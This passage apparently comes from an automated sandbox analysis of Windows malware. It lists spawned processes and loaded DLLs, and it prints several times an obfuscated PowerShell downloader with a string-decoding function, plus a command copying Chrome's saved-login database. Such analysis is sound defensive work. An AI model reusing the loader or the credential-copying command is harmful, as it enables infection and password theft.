Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
